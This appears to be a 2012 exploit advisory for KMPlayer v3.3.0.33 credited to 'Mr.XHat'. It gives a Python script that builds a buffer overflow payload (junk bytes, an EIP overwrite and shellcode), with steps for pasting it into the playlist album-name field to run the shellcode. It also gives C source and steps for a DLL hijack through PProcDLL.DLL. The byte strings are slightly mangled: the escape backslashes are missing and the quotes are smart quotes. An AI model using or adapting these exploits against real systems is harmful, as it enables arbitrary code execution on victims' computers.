KMPlayer Multiple Exploit

Summary

KM Player suffers from multiple vulnerabilities

Credit:

The information has been provided by Mr.XHat.


Details

Vulnerable Systems:
 * KMPlayer v3.3.0.33

# Buffer Overflow Vulnerability:

junk = ‘x41’ * 250
eip = ‘xD7x30x9Dx7C’
shellcode = (
‘x31xC9x51x68x63x61x6Cx63’
‘x54xB8xC7x93xC2x77xFFxD0’
)
exploit = junk + eip + shellcode
file = open(‘Exploit.txt’, ‘w’)
file.write(exploit)
file.close()

# How To Do Exploit:
# First Run The KMPlayer And Get To Playlist > Playlist Editor… > Add New album Then Past Exploit Code To ‘Album Name:’, Now Your Shellcode Will Executed!

# DLL Hijacking Vulnerability:

# DLL Name: PProcDLL.DLL

# How To Do Hijack:
First Compile Below Source Code With C Compiler(s) And Rename Compiled DLL To PProcDLL.DLL Then Copy It To The KMPlayer Installed Path, Now If You Run The KMPlayer DLL Will Hijacked!

#include <windows.h>
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
dll_hijack();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
int dll_hijack()
{
MessageBox(0, ‘DLL Hijacked!’, ‘Mr.XHat’, MB_OK);
}
#

Disclosure Timeline:
Published: 2012-11-04

Categories: Exploits